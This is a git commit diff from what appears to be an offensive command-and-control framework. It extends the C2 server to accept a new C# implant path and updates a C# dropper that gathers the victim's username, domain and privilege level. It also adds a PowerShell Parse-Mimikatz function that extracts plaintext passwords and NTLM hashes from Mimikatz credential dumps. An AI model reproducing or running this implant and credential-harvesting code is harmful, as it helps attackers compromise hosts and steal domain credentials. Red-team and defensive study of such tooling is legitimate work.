Truncated large output in CSV/HTML to stop this being > 100MB. Re-added Parse-Mimikatz feature. Updated CS dropper to work on Server 2003 with .NET v4.

2019-03-07 09:34:19 +00:00 · 2019-03-07 09:34:19 +00:00 · 1b76ccfe57
parent 8a092df9d6
commit 1b76ccfe57
4 changed files with 130 additions and 14 deletions
--- a/C2Server.py
+++ b/C2Server.py
@ -149,6 +149,8 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
            implant_type = "C#"
          if s.path == ("%s?p?c" % new_implant_url):
            implant_type = "C#"
+          if s.path == ("%s?d?c" % new_implant_url):
+            implant_type = "C#"
                                  
          if implant_type == "C#":
            cookieVal = (s.cookieHeader).replace("SessionID=","")
--- a/Files/dropper.cs
+++ b/Files/dropper.cs
@ -174,7 +174,13 @@ public class Program
 	{
 		if (Convert.ToDateTime("#REPLACEKILLDATE#") > DateTime.Now)
 		{
-			var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
+			var u = "";
+			try
+			{
+				u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
+			} catch {
+				u = System.Environment.UserName;
+			}
 			if (IsHighIntegrity())
 			  u += "*";
 			var dn = System.Environment.UserDomainName;
--- a/HTML.py
+++ b/HTML.py
@ -403,6 +403,10 @@ __________            .__.     _________  ________
    framelen = frame['RandomURI'].count()
    for x in range(0, framelen):
      try:
+        if (len(frame['Output'][x]) > 1000032):
+          print "[-] Truncating output as this row is over 10mb:"
+          print frame['Command'][x]
+          frame['Output'][x] = "Truncated"
        frame['RandomURI'][x]
        a = get_htmlimplant(str(frame['RandomURI'][x]))
        frame['RandomURI'][x] = a[11] + "\\" + a[2] + " @ " + a[3]
--- a/Modules/Invoke-Mimikatz.ps1
+++ b/Modules/Invoke-Mimikatz.ps1
@ -2743,3 +2743,107 @@ $results = Main;
 "Hostname: $HostName / $DomainSID";
 $results
 }
+
+
+
+function Parse-Mimikatz {
+param(
+    [Parameter(
+        Position=0,
+        Mandatory=$true,
+        ValueFromPipeline=$true,
+        ValueFromPipelineByPropertyName=$true)
+    ]
+    [String[]]$raw
+    )
+
+    # msv
+	$results = $raw | Select-String -Pattern "(?s)(?<=msv :).*?(?=tspkg :)" -AllMatches | %{$_.matches} | %{$_.value}
+    if($results){
+        foreach($match in $results){
+            if($match.Contains("Domain")){
+                $lines = $match.split("`n")
+                foreach($line in $lines){
+                    if ($line.Contains("Username")){
+                        $username = $line.split(":")[1].trim()
+                    }
+                    elseif ($line.Contains("Domain")){
+                        $domain = $line.split(":")[1].trim()
+                    }
+                    elseif ($line.Contains("NTLM")){
+                        $password = $line.split(":")[1].trim()
+                    }
+                }
+                if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
+                    $domain+"\"+$username+":"+$password
+                }
+            }
+        }
+    }
+    $results = $raw | Select-String -Pattern "(?s)(?<=tspkg :).*?(?=wdigest :)" -AllMatches | %{$_.matches} | %{$_.value}
+    if($results){
+        foreach($match in $results){
+            if($match.Contains("Domain")){
+                $lines = $match.split("`n")
+                foreach($line in $lines){
+                    if ($line.Contains("Username")){
+                        $username = $line.split(":")[1].trim()
+                    }
+                    elseif ($line.Contains("Domain")){
+                        $domain = $line.split(":")[1].trim()
+                    }
+                    elseif ($line.Contains("Password")){
+                        $password = $line.split(":")[1].trim()
+                    }
+                }
+                if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
+                    $domain+"\"+$username+":"+$password
+                }
+            }
+        }
+    }
+    $results = $raw | Select-String -Pattern "(?s)(?<=wdigest :).*?(?=kerberos :)" -AllMatches | %{$_.matches} | %{$_.value}
+    if($results){
+        foreach($match in $results){
+            if($match.Contains("Domain")){
+                $lines = $match.split("`n")
+                foreach($line in $lines){
+                    if ($line.Contains("Username")){
+                        $username = $line.split(":")[1].trim()
+                    }
+                    elseif ($line.Contains("Domain")){
+                        $domain = $line.split(":")[1].trim()
+                    }
+                    elseif ($line.Contains("Password")){
+                        $password = $line.split(":")[1].trim()
+                    }
+                }
+                if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
+                    $domain+"\"+$username+":"+$password
+                }
+            }
+        }
+    }
+    $results = $raw | Select-String -Pattern "(?s)(?<=kerberos :).*?(?=ssp :)" -AllMatches | %{$_.matches} | %{$_.value}
+    if($results){
+        foreach($match in $results){
+            if($match.Contains("Domain")){
+                $lines = $match.split("`n")
+                foreach($line in $lines){
+                    if ($line.Contains("Username")){
+                        $username = $line.split(":")[1].trim()
+                    }
+                    elseif ($line.Contains("Domain")){
+                        $domain = $line.split(":")[1].trim()
+                    }
+                    elseif ($line.Contains("Password")){
+                        $password = $line.split(":")[1].trim()
+                    }
+                }
+                if ($password -and $($password -ne "(null)") -and (!$username.Contains('$'))){
+                    $domain+"\"+$username+":"+$password
+                }
+            }
+        }
+    }
+}